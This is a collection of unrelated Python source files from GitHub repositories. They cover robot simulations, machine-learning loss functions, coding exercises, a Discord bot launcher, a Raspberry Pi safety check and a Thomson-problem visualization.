+{"seq_id":"38245707427","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated on Tue Sep 15 10:37:53 2020\n\n@author: Guy\n\nImplements a dynamical system of a robot (double integrator) with a range sensor measuring\nits position relative to a wall. The measurements are not Normally distributed, but characterized\nwith the \"beam model\" (see \"Probablistic Robotics\" chapter 6). The aim is to see the reachable \nsets of the system under given controls and this noise.\n\"\"\"\n\n# general stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as spi\nimport scipy.interpolate as interpolate\nfrom scipy import stats\n\n#try:\n#\tfrom pydrake.all import LinearQuadraticRegulator\n#except:\n#\t# newer version of drake\nfrom pydrake.systems.controllers import LinearQuadraticRegulator\n\n# my helper classes\nfrom map_generator import MapGenerator\n\n# some behavioral control switches\ncontinuous = False\n#'const', 'linear', 'saw', 'sine', 'square', 'file'\nMap = MapGenerator(north_type='square', south_type='saw', center_type='const')\n\n# parameters of simulation\nconst_velocity = 0.5 # in x direction [m/sec]\nm = 1.0 # robot mass [Kg]\ndt = 0.01 # integration step time [sec]\nTmax = 10 # simulation time [sec]\nmeas_max = 6.0 # max measurement of the range sensor [m]\n\n# vector of measurements\n#sensor_array = np.array([90.]) # array of angles with respect to the x axis\nsensor_array = np.array([90., -90.]) # array of angles with respect to the x axis\n#sensor_array = np.array([90., 45., -45., -90.]) # array of angles with respect to the x axis\n\n# estimator memory variables\nz_est = np.array([[0.], [0.]]) # y, y'\nu_est = 0.\n# check via matlab or place some algorithm here to calculate the gains for each (A,C)\n# A = [0 1; 0 0]\n# C = [-1/sin(a1) 0; -1/sin(a2) 0 ....]\n# p = -2*pi*1*[cosd(45)+i*sind(45), -cosd(45)-i*sind(45)]\n# L = place(A',C',p).'\n#L = np.array([[-8.89], [-39.48]]) # [+90]; w=1Hz, zeta=0.7\nL = np.array([[-4.44, 4.44], [-19.74, 19.74]]) # [+90,-90]; w=1Hz, zeta=0.7\n#L = np.array([[-2.96,-2.10,2.10,2.96], [-13.16,-9.31,9.31,13.16]]) # [+90,+45,-45,-90]; w=1Hz, zeta=0.7\n\n# wall y location with respect to x. y_dir =1 if north wall, y_dir=-1 if south\ndef wall_y_location(x, y_dir=1.):\n\tif(y_dir > 0.):\n\t\treturn Map.north_wall(x)\n\telse:\n\t\treturn Map.south_wall(x)\n\n# state z has three components: z=[x, y, y'].\ndef plant(z, t):\n\tN_sensors = sensor_array.shape[0]\n\tmeas = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\t# state feedback control (on y-position) is the distance to the wall\n\t\tideal_y = wall_y_location(z[0], y_dir=north_wall) - z[1]\n\t\tif(np.abs(sensor) <= 0.001):\n\t\t\t# case where there is a sensor heading in x direction\n\t\t\t# assume infinite wall so no wall is infront\n\t\t\tmeas[i][0] = meas_max\n\t\telse:\n\t\t\t# get the ideal ray to the wall\n\t\t\tideal_meas= ideal_y / np.sin(np.deg2rad(sensor))\n\t\t\t# get the new noise distribution (because it varies with the nominal meas.)\n\t\t\tpdf, bins = noise_dist(ideal_meas, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1)\n\t\t\t# only Gaussian noise (for debug)\n\t\t\t# pdf, bins = noise_dist(ideal_meas, a1=.3, a2=0., a3=0., a4=0., norm_sig=0.1)\n\t\t\t# sample a new measurement from the inverse cdf using a uniform random number in [0,1]\n\t\t\tmeas[i][0] = inverse_transform_sampling(pdf, bins) \n\n\t# output feedback control\n\tu = control(Map.center_line(z[0]), meas, z[0])\n\t\n\t'''\n\t# discretized\n zdot[0] = z[0] + 0 + 0 + dt * const_velocity\n zdot[1] = 0 + z[1] + dt * z[2] + dt*dt/(2.*m) * u\n\tzdot[2] = 0 + 0 + z[2] + dt/m * u\n\t'''\n\tzdot = z.copy()\n\tzdot[0] = const_velocity # x' = v_const\n\tzdot[1] = z[2] # y' = y'\n\tzdot[2] = 1./m * u # m*y'' = u\n\t\n # We return z'=[x', y', y''] and measured output y\n\treturn zdot, meas\n\n# state estimation (pole placement) + state feedback (LQR). \n#ref- y to be in. meas- the measurements vector. x- just for the wall function\ndef control(ref, meas, x):\n\tglobal z_est\n\tglobal u_est\n\tglobal L\n\t\n\t# observer gain (only for 1 measurement, if you have more, compute in matlab).\n\t#wn = 2.*np.pi*1. # 1Hz observer\n\t#xi = 0.7 # damping factor\n\t#LL = np.array([[-2.*xi*wn], [-wn*wn]]) # pole-placement\n\t\n\t# create the range estimation for each sensor\n\tN_sensors = meas.shape[0]\n\tmeas_est = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\ty_est = wall_y_location(x, y_dir=north_wall) - z_est[0][0]\n\t\tif(np.abs(sensor) < 0.001):\n\t\t\tmeas_est[i][0] = np.inf\n\t\telse:\n\t\t\tmeas_est[i][0] = y_est / np.sin(np.deg2rad(sensor))\n\t\t\n\t# Luenberger Observer\n\tf = np.array([[z_est[1][0]], \\\n\t\t\t\t [1./m * u_est] ])\n\t# Estimator equations\n\tzdot_est = f + L.dot(meas - meas_est)\n\t# Euler integration\n\tz_est = z_est + dt * zdot_est\n\t\n\t# now we can do state feedback control (x-axis doesn't really play here)\n\tAf = np.array([[0.,1.], [0.,0.]])\n\tBf = np.array([[0.], [1./m]])\n\tQ = np.eye(2)\n\tR = np.eye(1)\n\tKf, Qf = LinearQuadraticRegulator(Af, Bf, Q, R)\n\t\n\tu_est = ref - Kf.dot(z_est)[0][0]\n\t# do nothing (for debug)\n\t#u_est = 0.\n\t\n\treturn u_est\n\n# implements the noise pdf of the beam model and allows some parameters to be set\ndef noise_dist(x_true, a1=1., a2=1., a3=1., a4=.1, norm_sig=1., exp_lambda=1., uni_delta=0.5, plot=False):\n\tN = 100\n\t\n\t# the discretization of the space (bins)\n\tx = np.linspace(0, meas_max, N)\n\t# -x_true because we shift it and for some reason it looks at the truncated dist before shift :(\n\trv_norm = stats.truncnorm(-x_true, meas_max-x_true, loc=x_true, scale=norm_sig) \n\trv_exp = stats.expon()\n\trv_uni = stats.uniform()\n\t\n\t# the beam model pdf (see prob. robotics book ch. 6)\n\tpdf = a1 * rv_norm.pdf(x) + \\\n\t\t a2 * rv_exp.pdf(exp_lambda*x)*exp_lambda + \\\n\t\t a3 * rv_uni.pdf((x-0.)/meas_max)/meas_max + \\\n\t\t a4 * rv_uni.pdf((x-(meas_max-uni_delta))/uni_delta)/uni_delta\n\n\tif(plot):\n\t\t# plot the dist for debugging\n\t\tfig, ax = plt.subplots(1, 1)\n\t\tax.plot(x, pdf)\n\t\tplt.title('p(x) for the beam model')\n\t\tplt.show(block=False)\n\t\t\n\treturn pdf, x\n\n# both creates the inverse cdf and samples and returns numbers from this distribution\ndef inverse_transform_sampling(pdf, bin_edges, n_samples=1):\n\t#import pdb; pdb.set_trace()\n\t# this sort of creates the histogram by taking to adjacent pdf values and averaging them for every bin\n\tpdf = 0.5 * ( pdf[:-1] + pdf[1:] )\n\t# construct the CDF\n\tcum_values = np.zeros(bin_edges.shape)\n\tcum_values[1:] = np.cumsum(pdf*np.diff(bin_edges))\n\t# normalize to a standard distribution because it wasn't done before\n\tcum_values = cum_values/cum_values[-1] \n\t\n\tinv_cdf = interpolate.interp1d(cum_values, bin_edges)\n\t# u in [0,1]\n\tu = np.random.rand(n_samples)\n\t# return the function for later use\n\treturn inv_cdf(u)\n\ndef simulate_c():\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=Tmax.\n\tt = np.linspace(0., 10., Tmax)\n\t# The initial position is (0, 0).\n\tz0 = np.zeros(3)\n\t\n\t# We simulate the system and evaluate z\n\tz = spi.odeint(plant, z0, t, args=(k,))\n\t\n\treturn t, z\n\n# implements a standard Euler integration steps in a loop\ndef simulate_d():\n\tglobal z_est\n\tglobal u_est\n\tz_est = np.array([[0.], [0.]])\n\tu_est = 0.\n\t\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=10.\n\tt_vec = np.arange(0., Tmax, dt)\n\t# The initial position is (0, 0).\n\t#z = np.array([0., 0., 0.])\n\tz = np.array([0., 1., 0.])\n\tz_save, z_est_save, u_save, meas_save = [], [], [], []\n\t\n\tN_sensors = sensor_array.shape[0]\n\n\t# We simulate the system and evaluate z\n\tfor t in t_vec:\n\t\t# get the derivatives\n\t\tzdot, meas = plant(z, t)\n\t\t# Euler integration\n\t\tz = z + dt * zdot \n\t\t# save for telemetry\n\t\tif(len(z_save) == 0):\n\t\t\tz_save = np.array([z])\n\t\t\tz_est_save = np.array(z_est.reshape((1,2))) # only save y,y' at the moment\n\t\t\tmeas_save = np.array(meas.reshape((1,N_sensors)))\n\t\t\tu_save = np.array([u_est])\n\t\telse:\n\t\t\tz_save = np.vstack([z_save, z])\n\t\t\tmeas_save = np.vstack([meas_save, meas.reshape((1,N_sensors))])\n\t\t\tz_est_save = np.vstack([z_est_save, z_est.reshape((1,2))])\n\t\t\tu_save = np.vstack([u_save, u_est])\n\t\n\treturn t_vec, z_save, meas_save, z_est_save, u_save\n\ndef single_run():\n\tif(continuous):\n\t\tt, state = simulate_c()\n\telse:\n\t\tt, state, meas, state_est, controls = simulate_d()\n\n\t# plot the dist for debugging\n\t#pdf, bins = noise_dist(3.0, a1=.5, a2=0.1, a3=.3, a4=.04)\n\tpdf, bins = noise_dist(3.0, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1, plot=True)\n\n\t# visualizations\n\tfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n\tax1.plot(t, state[:, 1], label='$y(t)$')\n\tax1.plot(t, state_est[:, 0], label='$\\^y(t)$')\n\tax2.plot(t, controls[:], label='$u_y(t)$', alpha=0.2)\n\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0], y_dir=1.0) )\n\t\ts_wall.append( wall_y_location(state[i, 0], y_dir=-1.0 ) )\n\t\n\tfor i, sensor in enumerate(sensor_array):\n\t\tif sensor > 0.:\n\t\t\tax1.plot(t, n_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\t\telse:\n\t\t\tax1.plot(t, s_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\n\t#ax.plot([t[0], t[-1]], [3., 3.], label='north wall', color='k', linewidth=6)\n\tax1.plot(t, n_wall, label='north wall', color='k', linewidth=6)\n\t#ax.plot([t[0], t[-1]], [-3., -3.], label='south wall', color='k', linewidth=6)\n\tax1.plot(t, s_wall, label='south wall', color='k', linewidth=6)\n\tax1.legend(loc='upper right')\n\tax1.set_title('state vs. time (%d sensors)'%(len(sensor_array)))\n\tax2.legend(loc='upper right')\n\tax2.set_title('controls vs. time')\n\tax1.set_xlim(t[0], t[-1])\n\tax1.set_ylim(-np.max(np.abs(n_wall)), np.max(np.abs(n_wall)))\n\t\n\tfig, ax3 = plt.subplots(1, 1)\n\tax3.plot(state[:, 0], state[:, 1], label='$robot$')\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend(loc='upper right')\n\tax3.set_title('Robot in workspace')\n\t\n\tplt.show() #block=True)\n\t\ndef multi_run(n=10):\n\t# visualizations\n\tfig, ax3 = plt.subplots(1, 1)\n\n\tfor idx in range(n):\n\t\tt, state, meas, state_est, controls = simulate_d()\n\t\tprint('finished run #%d' %(idx))\n\t\tax3.plot(state[:, 0], state[:, 1], label='$%d$'%(idx), alpha=0.2)\n\t\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0]) )\n\t\ts_wall.append( -3. )\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend()\n\tax3.set_title('Robot in workspace')\n\n\tplt.show()\n\n\nif __name__ == \"__main__\":\n\t\n\tsingle_run()\n\t#multi_run()\n","repo_name":"sguysc/Perception_verification","sub_path":"simulate_dbl_int_in_corridor_numpy.py","file_name":"simulate_dbl_int_in_corridor_numpy.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71566940843","text":"import dataclasses\nfrom typing import List\n\nimport einops\nimport jax.numpy as jnp\n\nfrom apax.utils.math import normed_dotp\n\n\ndef weighted_squared_error(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Squared error function that allows weighting of\n individual contributions by the number of atoms in the system.\n \"\"\"\n return (label - prediction) ** 2 / divisor\n\n\ndef force_angle_loss(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function. Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n return (1.0 - dotp) / divisor\n\n\ndef force_angle_div_force_label(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n):\n \"\"\"\n Consine similarity loss function weighted by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n loss = jnp.where(F_0_norm > 1e-6, (1.0 - dotp) / F_0_norm, jnp.zeros_like(dotp))\n return loss\n\n\ndef force_angle_exponential_weight(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function exponentially scaled by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n return (1.0 - dotp) * jnp.exp(-F_0_norm) / divisor\n\n\nloss_functions = {\n \"molecules\": weighted_squared_error,\n \"structures\": weighted_squared_error,\n \"vibrations\": weighted_squared_error,\n \"cosine_sim\": force_angle_loss,\n \"cosine_sim_div_magnitude\": force_angle_div_force_label,\n \"cosine_sim_exp_magnitude\": force_angle_exponential_weight,\n}\n\n\n@dataclasses.dataclass\nclass Loss:\n \"\"\"\n Represents a single weighted loss function that is constructed from a `name`\n and a type of comparison metric.\n \"\"\"\n\n name: str\n loss_type: str\n weight: float = 1.0\n\n def __post_init__(self):\n if self.loss_type not in loss_functions.keys():\n raise NotImplementedError(\n f\"the loss function '{self.loss_type}' is not known.\"\n )\n\n if self.name not in [\"energy\", \"forces\", \"stress\"]:\n raise NotImplementedError(f\"the quantity '{self.name}' is not known.\")\n self.loss_fn = loss_functions[self.loss_type]\n\n def __call__(self, inputs: dict, prediction: dict, label: dict) -> float:\n # TODO we may want to insert an additional `mask` argument for this method\n divisor = self.determine_divisor(inputs[\"n_atoms\"])\n loss = self.loss_fn(label[self.name], prediction[self.name], divisor=divisor)\n return self.weight * jnp.sum(jnp.mean(loss, axis=0))\n\n def determine_divisor(self, n_atoms: jnp.array) -> jnp.array:\n divisor_id = self.name + \"_\" + self.loss_type\n divisor_dict = {\n \"energy_structures\": n_atoms**2,\n \"energy_vibrations\": n_atoms,\n \"forces_structures\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"cosine_sim_div_magnitude\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim_exp_magnitude\": einops.repeat(\n n_atoms, \"batch -> batch 1 1\"\n ),\n \"stress_structures\": einops.repeat(n_atoms**2, \"batch -> batch 1 1\"),\n \"stress_vibrations\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n }\n divisor = divisor_dict.get(divisor_id, jnp.array(1.0))\n\n return divisor\n\n\n@dataclasses.dataclass\nclass LossCollection:\n loss_list: List[Loss]\n\n def __call__(self, inputs: dict, predictions: dict, labels: dict) -> float:\n total_loss = 0.0\n for single_loss_fn in self.loss_list:\n loss = single_loss_fn(inputs, predictions, labels)\n total_loss = total_loss + loss\n\n return total_loss\n","repo_name":"apax-hub/apax","sub_path":"apax/train/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"18905115919","text":"# -*- coding: utf-8 -*-\r\n# Rodrigo - Prova 3, Area Inferior, 1188\r\nOperacao = str(input()) #Input da operação.\r\n\r\nsoma = 0 #Armazenará a soma dos elementos da matriz.\r\nM = [[' ']*12]*12 #Criação da matriz 12x12\r\nfor i in range(0, 12): #Dois For's que vão percorrer a matriz 12x12 e somar os elementos.\r\n for j in range(0, 12):\r\n M[i][j] = float(input())\r\n if (i >= 7) and (j <= i - 1) and (j >= 12 - i) and (i + j != 11) and (i != j): #Condição pra acessar só os elementos da área inferior.\r\n soma += M[i][j]\r\n\r\nmedia = soma / 144 #Média dos elementos da matriz.\r\n\r\nif Operacao == 'S': #Dependendo do input da operação, será impresso a soma ou a média na tela.\r\n print(f'{soma:.1f}')\r\nelif Operacao == 'M': \r\n print(f'{media:.1f}')","repo_name":"RodrigoSdeCarvalho/uri-online-judge","sub_path":"1188.py","file_name":"1188.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"20900985547","text":"import nextcord\nfrom nextcord import AllowedMentions, Interaction, SlashOption, ChannelType, ApplicationCheckFailure\nfrom nextcord.ext import commands, tasks, application_checks\nimport os\nfrom dotenv import load_dotenv\nfrom cooldowns import CallableOnCooldown\nimport logging\n\nlogger = logging.getLogger('nextcord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='nextcord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\nload_dotenv()\nTOKEN = os.getenv(\"TOKEN\")\nclient = commands.Bot(owner_ids=[482232269038288916])\n\n@client.event\nasync def on_ready():\n print(\"Bot hazır\")\n print(\"-----------------\")\n await client.change_presence(activity=nextcord.Game(name='asdfg'))\n\n@client.event\nasync def on_application_command_error(inter: nextcord.Interaction, error):\n error = getattr(error, \"original\", error)\n if isinstance(error, CallableOnCooldown):\n em = nextcord.Embed(color=0xff0000, title=\"**Fazla hızlısın!** :x:\", description=f\"{error.retry_after} saniye sonra tekrar dene.\")\n await inter.send(embed=em, ephemeral=True)\n elif isinstance(error, ApplicationCheckFailure):\n em = nextcord.Embed(color=0xff0000, title=\"**Error!** :x:\", description=f\"No permissions.\")\n await inter.send(embed=em, ephemeral=True)\n else:\n raise error\n\nfor fn in os.listdir(\"./cogs\"):\n if fn.endswith(\".py\"):\n client.load_extension(f\"cogs.{fn[:-3]}\")\n else:\n pass\n\n@client.slash_command(\n name=\"cog\"\n)\n@application_checks.is_owner()\nasync def cog(interaction: nextcord.Interaction):\n pass\n@cog.subcommand()\n@application_checks.is_owner()\nasync def load(interaction: nextcord.Interaction, extension: str):\n client.load_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yüklendi!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def unload(interaction: nextcord.Interaction, extension: str):\n client.unload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog durduruldu!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def reload(interaction: nextcord.Interaction, extension: str):\n client.reload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yeniden yüklendi!\")\n\nclient.run(TOKEN)","repo_name":"JustBurakk/ahmetbot","sub_path":"ahmet-main.py","file_name":"ahmet-main.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39768941455","text":"#define two lists\r\na = [1,1,2,3,5,8,13,21,34,55,89]\r\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13]\r\n\r\n#define an empty list for storing shared values\r\nc = []\r\n\r\n#iterate through one of the lists and check for each element whether it's a shared value or not\r\n'''it checks whether the length of the list is greater than zero because we remove all elements that are\r\nequal to the current element (including that element) in order to avoid duplicates'''\r\nwhile len(a)>0:\r\n\r\n #we always take the first element because after removing the previous element we end up with the next element\r\n #being in the index 0\r\n i = a[0]\r\n\r\n #check whether it exists in the other list as well\r\n if b.count(i)>0:\r\n\r\n #add it to the list of shared elements\r\n c.append(i)\r\n\r\n #remove all values equal to i form the first list in order to avoid duplicates\r\n for j in range(a.count(i)):\r\n a.remove(i)\r\n\r\nprint(c)\r\n","repo_name":"georgead01/TA_EXAM","sub_path":"second_question.py","file_name":"second_question.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37872359720","text":"import RPi.GPIO as GPIO\nimport time\n\ndef waitForSafety():\n #pin numbers\n sensor = 21\n led = 18\n button = 15\n\n #set up all the pins\n GPIO.setmove(GPIO.BCM)\n GPIO.setup(sensor, GPIO.IN)\n GPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #required for button usage\n GPIO.setup(led, GPIO.OUT)\n\n GPIO.output(led, False) #start with LED off\n print(\"Performing safety checks...\")\n print(\" \")\n\n while True:\n if (not GPIO.input(sensor)) and GPIO.input(button) == GPIO.HIGH:\n GPIO.output(led, True)\n print('Safety checks complete. Starting in 3s.')\n time.sleep(3)\n GPIO.cleanup()\n break\n else:\n GPIO.output(led, False)","repo_name":"shreyapatill/ecehonorslab","sub_path":"RubiksSolver/sensor_led_output.py","file_name":"sensor_led_output.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38392495428","text":"from typing import List\n\nimport pytest\n\nfrom StudyNotes.TestDevelopHomework.PhaseThreeHomework.CounterDemo.Counter import CounterDemoTest\n\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n\n\n@pytest.fixture(scope=\"class\")\ndef counterBegin():\n print(\"开始计算\")\n # 实例化CounterDemo类\n counterDemoTest = CounterDemoTest()\n yield counterDemoTest\n\n print(\"计算结束\")","repo_name":"Zuoxixian/TESTDEVELOP","sub_path":"StudyNotes/TestDevelopHomework/PhaseThreeHomework/TestCounterDemo/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"25921571963","text":"\"\"\"\nan example of create and get stream\n\"\"\"\n\n\nfrom streamr import Client, Option\n\n# To create or get a stream you should create a client object at first\nmy_option = Option.get_default_option()\nmy_option.api_key = 'your-api-key'\n\nmy_client = Client(my_option)\n\n# To create a new stream, you can use 'create_stream' or 'get_or_create_stream' with a 'name' parameter\n# Note that create_stream is running forcefully.\n# That means you can create two stream with same name but the stream_ids are different\n\n\nstream1 = my_client.create_stream('stream-test-1')\n\nstream2 = my_client.get_or_create_stream('stream-test-2')\n\n# To get a stream, you can use 'get_stream_by_name' or get_stream_by_id' method\n\n# get_stream_by_name will return all the streams with steam name\n# the return is a list object containing the information of all streams\nstream3 = my_client.get_stream_by_name('stream-test-2')\n\n# get stream by id will return the stream with the stream_id\n# the return is a dictionary containing the information of the stream\n# Before using this methods, you should replace the stream_id with a 32 bytes strings, which\n# can be found in the stream page, also can be obtained using the get_stream_by_name method.\nstream_id = stream2[0]['id']\nstream4 = my_client.get_stream_by_id(stream_id)\n","repo_name":"streamr-dev/streamr-client-python","sub_path":"examples/createOrGetStream.py","file_name":"createOrGetStream.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"16992563670","text":"import matplotlib\nmatplotlib.use('QtAgg')\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom scipy.optimize import dual_annealing\n\ndef polar_to_cartesian(m):\n return np.array([\n np.sin(m[0]) * np.cos(m[1]),\n np.sin(m[0]) * np.sin(m[1]),\n np.cos(m[0])\n ])\n\ndef filter_indexes(x):\n return np.any(x[0] < x[1])\n\n\nclass Thomson(object):\n def __init__(self) -> None:\n self.nb_call = 0\n self.best_value = np.inf\n\n def objective(self, x):\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n\n def rdist_fun(x):\n return np.array(\n 1 / np.sqrt(np.sum(\n (y_mat[x[0]] - y_mat[x[1]])** 2))\n )\n\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n seq_vec = np.arange(0, x_mat.shape[0])\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n rdist = np.apply_along_axis(rdist_fun, axis=1, arr=indexes)\n fvalue = np.sum(rdist)\n if fvalue < self.best_value:\n self.best_value = fvalue\n update_plot(x, fvalue, self.nb_call, self.best_value, better=True)\n else:\n update_plot(x, fvalue, self.nb_call, self.best_value, better=False)\n self.nb_call +=1 \n return fvalue\n\n\nn_particles = 12\nlw = np.array([0] * (n_particles * 2))\nup = np.concatenate((\n np.repeat(np.pi, n_particles),\n np.repeat(2 * np.pi, n_particles)), axis=None)\nbounds=list(zip(lw, up))\n\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\nu, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:20j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\ndef init_sphere():\n ax.plot_wireframe(x, y, z, color=\"grey\", linewidth=0.2)\n ax.plot_surface(x, y, z, color=\"g\", alpha=0.1)\n return fig,\n\ndef update_plot(x, f, nb_call, best_value, better):\n ax.view_init(elev=20, azim=nb_call % 360 )\n ax.set_title(f'Nb function call: {nb_call} Energy: {best_value:.6f}')\n if better:\n plt.cla()\n init_sphere()\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n for i in range(n_particles):\n ax.scatter(y_mat[i, 0], y_mat[i, 1], y_mat[i, 2])\n seq_vec = np.arange(0, n_particles)\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n for i in range(indexes.shape[0]):\n ax.plot(\n [\n y_mat[indexes[i, 0], 0],\n y_mat[indexes[i, 1], 0],\n ],\n [\n y_mat[indexes[i, 0], 1],\n y_mat[indexes[i, 1], 1],\n ],\n [\n y_mat[indexes[i, 0], 2],\n y_mat[indexes[i, 1], 2],\n ], linewidth=0.9,\n )\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ion()\ninit_sphere()\nax.view_init(elev=20, azim=(90))\nthomson = Thomson()\nres = dual_annealing(thomson.objective, bounds=bounds)\n\n\n","repo_name":"sgubianpm/pyconie2022","sub_path":"thomson.py","file_name":"thomson.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72056921962","text":"import momo\nimport numpy as np\nfrom math import *\nfrom __common__ import *\n\ndef max_idx( value, reference ):\n cur_idx = -1\n for i in xrange( len( reference ) ):\n if value >= reference[i]:\n cur_idx = i\n return cur_idx\n \n\ndef compute_feature( reference, frame, radius = 3 ):\n feature = np.array( [0.] * FEATURE_LENGTH, dtype = np.float32 )\n\n for i in xrange( len( frame ) ):\n rel_x = frame[i][:2] - reference[:2]\n l_x = np.linalg.norm( rel_x )\n\n n = rel_x / l_x\n e = frame[i][:2] / np.linalg.norm( frame[i][:2] )\n cos_phi = np.dot( -n, e )\n force = ( LAMBDA + 0.5 * ( 1 - LAMBDA ) * ( 1 + cos_phi ) ) * exp( 2 * radius - l_x ) \n i = max_idx( force, ANGLES )\n if force > 0.5:\n feature[max( i, 0 )] += 1\n return feature\n\n\n\n","repo_name":"dichodaemon/momo","sub_path":"python/momo/features/helbing/compute_feature.py","file_name":"compute_feature.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
